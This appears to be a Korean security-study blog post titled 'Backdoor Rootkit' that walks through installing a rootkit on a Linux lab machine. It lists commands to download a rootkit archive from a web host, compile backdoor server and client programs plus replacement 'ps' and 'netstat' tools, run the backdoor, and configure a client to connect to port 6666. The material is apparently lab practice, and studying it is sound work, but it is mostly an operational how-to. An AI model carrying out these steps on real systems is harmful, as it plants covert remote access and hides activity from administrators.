본문 바로가기

INFOSEC/LINUX

Backdoor Rootkit

서버

[root@localhost ~]# mkdir /root/white_rootkit
[root@localhost ~]# wget http://200.200.200.200:8080/webshare/white_rootkit/white_rootkit.zip

 

[root@localhost ~]# yum -y install gcc

[root@localhost ~]# make
gcc -o white_backc white_backc.c
gcc -o white_backs white_backs.c
gcc -o white_net white_net.c
gcc -o white_ps white_ps.c

 

백도어 실행 

[root@localhost ~]# ./white_backs 

 

명령어 백업 해놓을것(/bin/ps,/bin/netstat)!!

[root@localhost ~]# cp /bin/ps /root/ps.back
[root@localhost ~]# cp /bin/netstat /root/netstat.back

 

# mv /root/white_rootkit.zip /root/white_rootkit/

[root@localhost ~]# cd /root/white_rootkit/
[root@localhost white_rootkit]# ls
white_rootkit.zip

 

 

 

 

 


클라이언트

# yum -y install gcc wget

# wget http://200.200.200.200:8080/webshare/white_rootkit/white_backc.c

 

# vi /root/white_backc.c

7  #define PORT 6666  ==> 서버에서도 6666 번으로 백도어를 열어야 한다.

21 s_addr.sin_addr.s_addr = inet_addr("서버주소");

'vi /root/white_backc.c

백도어 클라이언트 프로그램 생성

# gcc -o client white_backc.c

 

실행(백도어 서버 실행후 실행할것)

# ./client

백도어 실행

 

'INFOSEC > LINUX' 카테고리의 다른 글

SNORT  (0) 2019.09.26
Rootkit 감지  (0) 2019.09.25
Local Backdoor  (0) 2019.09.24
Local Backdoor  (0) 2019.09.23
시스템 로그 분석 ( logrotate )  (0) 2019.09.23